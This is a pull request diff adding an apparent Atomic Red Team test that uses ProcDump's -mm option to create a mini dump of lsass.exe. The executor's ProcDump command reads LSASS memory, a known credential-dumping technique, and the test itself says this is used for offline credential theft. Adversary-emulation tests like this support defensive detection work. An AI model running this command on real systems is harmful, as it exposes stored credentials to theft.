### PR TITLE
T1003.001 - procdump mini dump

### DIFF
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -255,3 +255,41 @@ atomic_tests:
       Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
     name: powershell
     elevation_required: true
+
+- name: Create Mini Dump of LSASS.exe using ProcDump
+  description: |
+    The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
+    ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe
+
+    Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
+
+    If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the  get-prereq_commands to download and install the ProcDump tool first.
+  supported_platforms:
+  - windows
+  input_arguments:
+    output_file:
+      description: Path where resulting dump should be placed
+      type: Path
+      default: C:\Windows\Temp\lsass_dump.dmp
+    procdump_exe:
+      description: Path of Procdump executable
+      type: Path
+      default: PathToAtomicsFolder\T1003.001\bin\procdump.exe
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
+    prereq_command: |
+      if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
+      Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
+      New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
+      Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
+  executor:
+    command: |
+      #{procdump_exe} -accepteula -mm lsass.exe #{output_file}
+    cleanup_command: |
+      del "#{output_file}" >nul 2> nul
+    name: command_prompt
+    elevation_required: true


### PR DESCRIPTION
Added test for procdump using -mm (instead of -ma). This method is similar to -ma, but will produce a mini dump file of lsass. 

Tested on Win10/server 2016. Confirmed Good.